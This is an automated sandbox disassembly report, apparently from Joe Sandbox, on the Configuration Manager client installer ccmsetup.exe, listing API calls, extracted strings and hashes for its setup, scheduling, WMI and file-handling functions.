                                                                                          • CreateUpgradeWinSchedTask, xrefs: 005C64E9
                                                                                          • wintask.cpp, xrefs: 005C6571
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_H_prolog3_catch_Time$CountCreateFileGuidSystemTick_rand
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$/UpgradeWinTask$Configuration Manager Client Upgrade Task$CreateUpgradeWinSchedTask$CreateWinSchedTask(c_szCcmSetupWinTaskName, sArguments, iDelayMinutes, sScheduledTimeUtc)$wintask.cpp$wintask.cpp
                                                                                          • API String ID: 3653105489-4010604289
                                                                                          • Opcode ID: f07aefc3ea61148972e4997811323eca679c01e143722a3806a7730fc13608c8
                                                                                          • Instruction ID: 74314441491394059b88e538b9f7d9f8b9c16c1b0539fd52a8184119193ce2d8
                                                                                          • Opcode Fuzzy Hash: f07aefc3ea61148972e4997811323eca679c01e143722a3806a7730fc13608c8
                                                                                          • Instruction Fuzzy Hash: 5931AD71E85389EADB10EBE48D0AFED7EA5BF14700F248059F544AB286C7B45B05CBA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006091A1
                                                                                            • Part of subcall function 005FDD82: __EH_prolog3_catch_GS.LIBCMT ref: 005FDD8C
                                                                                            • Part of subcall function 005FDD82: GetCurrentThreadId.KERNEL32 ref: 005FDE5C
                                                                                          Strings
                                                                                          • param ( [switch] $CheckComplianceOnly = $false)# Variables[System.Int32]$policyBinaryTimeoutSeconds = 300[System.Int32]$, xrefs: 006091D1
                                                                                          • <Ku, xrefs: 006091FF
                                                                                          • CCM::ManagedInstaller::AddManagedInstallerPolicyForCCM, xrefs: 006091AF
                                                                                          • @Lu, xrefs: 00609261
                                                                                          • %s HRESULT(0x%08x), xrefs: 0060920F
                                                                                          • 6, xrefs: 00609206
                                                                                          • >, xrefs: 00609268
                                                                                          • Managed installer script failed. Managed install policy set failed. Exit Code (%d), xrefs: 00609241
                                                                                          • Unable to execute powershell. Managed install policy set failed., xrefs: 006091E1
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchH_prolog3_catch_Thread
                                                                                          • String ID: %s HRESULT(0x%08x)$6$<Ku$>$@Lu$CCM::ManagedInstaller::AddManagedInstallerPolicyForCCM$Managed installer script failed. Managed install policy set failed. Exit Code (%d)$Unable to execute powershell. Managed install policy set failed.$param ( [switch] $CheckComplianceOnly = $false)# Variables[System.Int32]$policyBinaryTimeoutSeconds = 300[System.Int32]$
                                                                                          • API String ID: 1198108500-2785532472
                                                                                          • Opcode ID: a6c12365a8bde0e336518a5ed5ae407ebf797931e880a68ef8dec59894da4ed2
                                                                                          • Instruction ID: 6cc92db2417591d05c1d80dadbc0b991d6f64069045eb7a857701e5278acfff6
                                                                                          • Opcode Fuzzy Hash: a6c12365a8bde0e336518a5ed5ae407ebf797931e880a68ef8dec59894da4ed2
                                                                                          • Instruction Fuzzy Hash: 7921EF72D91209BBCB21DBA4C80ABDEBEB6AF51315F044059FA5077281C7B84A48CBE1
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0059D26C
                                                                                            • Part of subcall function 00576C52: __EH_prolog3.LIBCMT ref: 00576C59
                                                                                            • Part of subcall function 0058C6B5: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00576B90,?,?,00576BBF,00000004,0057100A), ref: 0058C6BC
                                                                                            • Part of subcall function 0058C6B5: GetLastError.KERNEL32(?,00576B90,?,?,00576BBF,00000004,0057100A), ref: 0058C6C6
                                                                                          • GetModuleFileNameW.KERNEL32(00570000,?,00000104), ref: 0059D2EE
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0059D346
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0059D437
                                                                                          • GetModuleFileNameW.KERNEL32(00570000,?,00000104), ref: 0059D4BC
                                                                                            • Part of subcall function 00579005: __EH_prolog3.LIBCMT ref: 0057900C
                                                                                            • Part of subcall function 00579005: EnterCriticalSection.KERNEL32(?,?,?,?,00000000), ref: 00579024
                                                                                            • Part of subcall function 00579005: LeaveCriticalSection.KERNEL32(?,?,?,?,00000000), ref: 00579043
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0059D517
                                                                                          Similarity
                                                                                          • API ID: Module$CriticalSection$FileH_prolog3H_prolog3_HandleName$CountEnterErrorInitializeLastLeaveSpin
                                                                                          • String ID: Module$Module_Raw$REGISTRY
                                                                                          • API String ID: 3285820555-549000027
                                                                                          • Opcode ID: 4f6131c97a4b06b177c53d33873f9151be17d0e0e35ffc309e932257485410ca
                                                                                          • Instruction ID: 6463ee594031864331b4dba23ab675a6babeefb41157a5b62c155527a595dc39
                                                                                          • Opcode Fuzzy Hash: 4f6131c97a4b06b177c53d33873f9151be17d0e0e35ffc309e932257485410ca
                                                                                          • Instruction Fuzzy Hash: 59A1C4729003299ADF20DBA4CC48BEE7BB8BF55310F1444A6E949E3141D775AF44DBB2
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005EE0FF
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00620449: __EH_prolog3_GS.LIBCMT ref: 00620450
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_H_prolog3_catch_
                                                                                          • String ID: CCM::Http::CWebProxy::Init$Converting target URL scheme to HTTPS.$Target URL scheme is HTTP: %s$Target URL scheme is HTTPS: %s$https$https$tuq$z
                                                                                          • API String ID: 3654751754-1462493551
                                                                                          • Opcode ID: 5c1df3b1753b2173adcc75fbb74a2b92ed33eaacdfe610ea1fed78b8ed11f2ab
                                                                                          • Instruction ID: 12684a3edfe34ef9612985e32f5c673c0c30f4e933db31f528ae8ded58454931
                                                                                          • Opcode Fuzzy Hash: 5c1df3b1753b2173adcc75fbb74a2b92ed33eaacdfe610ea1fed78b8ed11f2ab
                                                                                          • Instruction Fuzzy Hash: E351D171C0428D9ADF18EFE9C94AAEDBFB9BF51304F148059E5847B282CB745A48CB21
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00585247
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Client evaluation: Client is not installed.$DownloadAndExtractManifest(false, 0)$O,$all$ccmsetup.cpp$ccmsetup.cpp$prereqs
                                                                                          • API String ID: 2882836952-1267043384
                                                                                          • Opcode ID: 0107c1313db2ff0258ad0f043f76ef7ba9d64ac7e8370ded1829c977dd6971cd
                                                                                          • Instruction ID: 13ba9e7e1020258e592e7e103467ae809faba8ed79f050aaaa60628d13893cee
                                                                                          • Opcode Fuzzy Hash: 0107c1313db2ff0258ad0f043f76ef7ba9d64ac7e8370ded1829c977dd6971cd
                                                                                          • Instruction Fuzzy Hash: 8B31B430A41799AAEB11FB64CD4ABAEBF627F52704F144084F9457B2C2EBB81F44CB51
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00648113
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006481B1
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • GetSiteCode(sSMSSite), xrefs: 006481A7
                                                                                          • ..\lsad.cpp, xrefs: 006481B9
                                                                                          • CCM::LocationServices::LSGetSiteCodeFromWMI, xrefs: 0064811C
                                                                                          • LSGetSiteCodeFromWMI, xrefs: 0064815A
                                                                                          • LSGetSiteCodeFromWMI : Site code returned from WMI is <%s>, xrefs: 00648218
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006481AC
                                                                                          • ..\lsad.cpp, xrefs: 006481A1
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetSiteCodeFromWMI$GetSiteCode(sSMSSite)$LSGetSiteCodeFromWMI$LSGetSiteCodeFromWMI : Site code returned from WMI is <%s>
                                                                                          • API String ID: 3454896115-4095689340
                                                                                          • Opcode ID: 4707af96d091d7f7b5a80ff44e025be2346f1fcbc9b9fa4a9e155598c314ace7
                                                                                          • Instruction ID: cf065b822a6842b094db5223af583a02ceacab4ea0de9545ba648dd5827dcfcd
                                                                                          • Opcode Fuzzy Hash: 4707af96d091d7f7b5a80ff44e025be2346f1fcbc9b9fa4a9e155598c314ace7
                                                                                          • Instruction Fuzzy Hash: 6F310431940306AEDF10EBA0990A7ED7E66BF92714F140029F640BB3C3CBB95A46C7A5
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005A71AD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A71FF
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$,tl$CcmSetupManifest::GetFileName$CcmSetupManifest::GetFileName requested an index size is too large!$iIndex >= 0$manifest.cpp$manifest.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006062FB
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0060634D
                                                                                          • GetLastError.KERNEL32 ref: 00606357
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00606390
                                                                                          Strings
                                                                                          • ::GetSystemDirectoryW(szDir, (sizeof(szDir)/sizeof(szDir[0]))), xrefs: 00606386
                                                                                          • CCM::Utility::Filesystem::Directory::GetSystemDirectoryW, xrefs: 00606326
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060638B
                                                                                          • ..\CcmFile.cpp, xrefs: 00606380
                                                                                          • ..\CcmFile.cpp, xrefs: 00606398
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryErrorH_prolog3_catch_LastSystemThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\CcmFile.cpp$..\CcmFile.cpp$::GetSystemDirectoryW(szDir, (sizeof(szDir)/sizeof(szDir[0])))$CCM::Utility::Filesystem::Directory::GetSystemDirectoryW
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006063FD
                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000105,CCM::Utility::Filesystem::Directory::GetWindowsDirectoryW,?,?,?), ref: 0060644F
                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 00606459
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00606492
                                                                                          Strings
                                                                                          • CCM::Utility::Filesystem::Directory::GetWindowsDirectoryW, xrefs: 00606428
                                                                                          • ..\CcmFile.cpp, xrefs: 00606482
                                                                                          • ..\CcmFile.cpp, xrefs: 0060649A
                                                                                          • ::GetWindowsDirectoryW(szDir, (sizeof(szDir)/sizeof(szDir[0]))), xrefs: 00606488
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060648D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryErrorH_prolog3_catch_LastThreadWindows
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\CcmFile.cpp$..\CcmFile.cpp$::GetWindowsDirectoryW(szDir, (sizeof(szDir)/sizeof(szDir[0])))$CCM::Utility::Filesystem::Directory::GetWindowsDirectoryW
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AE382
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AE508
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AE503
                                                                                          • Product version for product '%s' does not exist. Treat as not installed., xrefs: 005AE4B9
                                                                                          • msiutil.cpp, xrefs: 005AE4F8
                                                                                          • msiutil.cpp, xrefs: 005AE514
                                                                                          • Upgrade code '%s': product = '%s', installed = %d, version = %s, xrefs: 005AE58E
                                                                                          • GetProductInstalledByUpgradeCode, xrefs: 005AE3EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetProductInstalledByUpgradeCode$Product version for product '%s' does not exist. Treat as not installed.$Upgrade code '%s': product = '%s', installed = %d, version = %s$msiutil.cpp$msiutil.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00640119
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0060A160: __EH_prolog3.LIBCMT ref: 0060A167
                                                                                            • Part of subcall function 00609891: __EH_prolog3.LIBCMT ref: 00609898
                                                                                            • Part of subcall function 005F4E46: __EH_prolog3_catch.LIBCMT ref: 005F4E4D
                                                                                            • Part of subcall function 005F4E46: GetCurrentThreadId.KERNEL32 ref: 005F4EB2
                                                                                            • Part of subcall function 005F4E46: __CxxThrowException@8.LIBCMT ref: 005F4F8F
                                                                                            • Part of subcall function 0060A7B3: __EH_prolog3.LIBCMT ref: 0060A7BA
                                                                                            • Part of subcall function 0060A7B3: SysFreeString.OLEAUT32(?), ref: 0060A804
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00640229
                                                                                          Strings
                                                                                          • true == elemProperty, xrefs: 0064021F
                                                                                          • CCM::LocationServices::GetCCMSettingsFromClientOperationalSettings, xrefs: 00640178
                                                                                          • ..\lsad.cpp, xrefs: 00640235
                                                                                          • CCM/CommandLine, xrefs: 006401C0
                                                                                          • ..\lsad.cpp, xrefs: 00640219
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00640224
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentThread$Exception@8FreeH_prolog3_catchH_prolog3_catch_StringThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$CCM/CommandLine$CCM::LocationServices::GetCCMSettingsFromClientOperationalSettings$true == elemProperty
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059A183
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,00000001), ref: 0059BA15
                                                                                          • ReleaseMutex.KERNEL32(?,?,?,00000001), ref: 0059BA3D
                                                                                          Strings
                                                                                          • Failed to remove ccmsetup service. Error 0x%x, xrefs: 0059B9EC
                                                                                          • CheckCCMSupportedEmbedded(bIsEmbedded, bIsSupported), xrefs: 0059A179
                                                                                          • ccmsetup.cpp, xrefs: 0059A18F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059A17E
                                                                                          • ccmsetup.cpp, xrefs: 0059A173
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentMutexObjectReleaseSingleThreadWait
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CheckCCMSupportedEmbedded(bIsEmbedded, bIsSupported)$Failed to remove ccmsetup service. Error 0x%x$ccmsetup.cpp$ccmsetup.cpp
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059A281
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,00000001), ref: 0059BA15
                                                                                          • ReleaseMutex.KERNEL32(?,?,?,00000001), ref: 0059BA3D
                                                                                          Strings
                                                                                          • Failed to remove ccmsetup service. Error 0x%x, xrefs: 0059B9EC
                                                                                          • spClientState->GetIsInMaintenanceMode(bIsInMaintenanceMode), xrefs: 0059A277
                                                                                          • ccmsetup.cpp, xrefs: 0059A28D
                                                                                          • ccmsetup.cpp, xrefs: 0059A271
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059A27C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentMutexObjectReleaseSingleThreadWait
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Failed to remove ccmsetup service. Error 0x%x$ccmsetup.cpp$ccmsetup.cpp$spClientState->GetIsInMaintenanceMode(bIsInMaintenanceMode)
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059A396
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,00000001), ref: 0059BA15
                                                                                          • ReleaseMutex.KERNEL32(?,?,?,00000001), ref: 0059BA3D
                                                                                          Strings
                                                                                          • Failed to remove ccmsetup service. Error 0x%x, xrefs: 0059B9EC
                                                                                          • GetServiceExecutionMutex(), xrefs: 0059A38C
                                                                                          • ccmsetup.cpp, xrefs: 0059A386
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059A391
                                                                                          • ccmsetup.cpp, xrefs: 0059A3A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentMutexObjectReleaseSingleThreadWait
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Failed to remove ccmsetup service. Error 0x%x$GetServiceExecutionMutex()$ccmsetup.cpp$ccmsetup.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00598355
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059841F
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0059842B
                                                                                          • Logs\, xrefs: 0059839C
                                                                                          • Filesystem::Directory::RecursiveDelete(m_sDownloadDir.c_str(), saFilesToKeep), xrefs: 00598415
                                                                                          • ccmsetup.cpp, xrefs: 0059840F
                                                                                          • CcmSetup::PurgeFilesAfterUninstall, xrefs: 0059837E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059841A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmSetup::PurgeFilesAfterUninstall$Filesystem::Directory::RecursiveDelete(m_sDownloadDir.c_str(), saFilesToKeep)$Logs\$ccmsetup.cpp$ccmsetup.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005AA09E
                                                                                            • Part of subcall function 00609C7A: __EH_prolog3_catch.LIBCMT ref: 00609C81
                                                                                            • Part of subcall function 00609C7A: GetCurrentThreadId.KERNEL32 ref: 00609CF1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AA11B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AA191
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::XML::Document::createNewDocument$CreateXMLDocument(&spDoc)$X:\bt\1024777\repo\src\common\inc\ccmxml.h$getPointer()->put_async(((VARIANT_BOOL)0))
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0064A285
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00640801: __EH_prolog3_catch.LIBCMT ref: 00640808
                                                                                            • Part of subcall function 00640801: GetCurrentThreadId.KERNEL32 ref: 00640858
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064A314
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064A30F
                                                                                          • ..\lsad.cpp, xrefs: 0064A304
                                                                                          • GetStringFromColumn(&col, sDistinguishedName), xrefs: 0064A30A
                                                                                          • ..\lsad.cpp, xrefs: 0064A320
                                                                                          • CCM::LocationServices::ValidateDistinguishedName, xrefs: 0064A2AA
                                                                                          • distinguishedName, xrefs: 0064A2CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::ValidateDistinguishedName$GetStringFromColumn(&col, sDistinguishedName)$distinguishedName
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006113F2
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00611441
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061147C
                                                                                          Strings
                                                                                          • pEvent->GetObjectText(0, &bsObjectText), xrefs: 00611472
                                                                                          • ..\Event.cpp, xrefs: 00611488
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00611477
                                                                                          • ..\Event.cpp, xrefs: 0061146C
                                                                                          • CCM::Utility::GetObjectText, xrefs: 00611423
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentFreeH_prolog3_catchStringThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\Event.cpp$..\Event.cpp$CCM::Utility::GetObjectText$pEvent->GetObjectText(0, &bsObjectText)
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00603016
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603073
                                                                                          • __CxxThrowException@8.LIBCMT ref: 006030EB
                                                                                          Strings
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060307B
                                                                                          • null() == false, xrefs: 00603069
                                                                                          • CCM::Utility::Wmi::Namespace::GetNamespacePath, xrefs: 0060302C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060306E
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603063
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentException@8H_prolog3_catchThreadThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$CCM::Utility::Wmi::Namespace::GetNamespacePath$null() == false
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060C054
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0060C143: __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 0060C143: GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060C0C4
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0060C134
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060C0BF
                                                                                          • ..\WmiObject.cpp, xrefs: 0060C0B4
                                                                                          • CCM::Utility::Wmi::Object::GetString, xrefs: 0060C079
                                                                                          • ..\WmiObject.cpp, xrefs: 0060C0D0
                                                                                          • GetString(pszName, sValue), xrefs: 0060C0BA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$Exception@8H_prolog3Throw
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::GetString$GetString(pszName, sValue)
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005FB0E9
                                                                                            • Part of subcall function 005FB1B1: __EH_prolog3_catch_GS.LIBCMT ref: 005FB1BB
                                                                                            • Part of subcall function 005FB1B1: ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\ccmsetup\ccmsetup.exe,?,00000104,CCM::Utility::GetCcmSetupDirectory), ref: 005FB218
                                                                                            • Part of subcall function 005FB1B1: GetLastError.KERNEL32 ref: 005FB226
                                                                                            • Part of subcall function 005FB1B1: GetCurrentThreadId.KERNEL32 ref: 005FB25F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB142
                                                                                          Strings
                                                                                          • ..\util.cpp, xrefs: 005FB14E
                                                                                          • ..\util.cpp, xrefs: 005FB132
                                                                                          • cache\, xrefs: 005FB170
                                                                                          • CCM::Utility::GetCcmSetupCacheDirectory, xrefs: 005FB0F3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005FB13D
                                                                                          • GetCcmSetupDirectory(false, sCcmSetupCacheDirectory), xrefs: 005FB138
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$EnvironmentErrorExpandH_prolog3_catchH_prolog3_catch_LastStrings
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$CCM::Utility::GetCcmSetupCacheDirectory$GetCcmSetupDirectory(false, sCcmSetupCacheDirectory)$cache\
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\String.cpp$..\String.cpp$CCM::Utility::String::toBool$false$true
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B408D
                                                                                            • Part of subcall function 005B3537: __EH_prolog3_catch_GS.LIBCMT ref: 005B3541
                                                                                            • Part of subcall function 005B3537: GetSystemTime.KERNEL32(?,CreateCCMSetupRegistryTimeStamp,00000084,005B38AF,?,CCMSetup,CreateClientInstallTimeStamp,0000002C,00579DED,00000000,00000001,00000000,00000001,00000000,00000000,?), ref: 005B359B
                                                                                            • Part of subcall function 005B3537: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,REINSTALLMODE,00000001,?,REINSTALL,00000001,?,CcmSetup::ApplyDeltaLangChanges,00000001,00000000), ref: 005B35AC
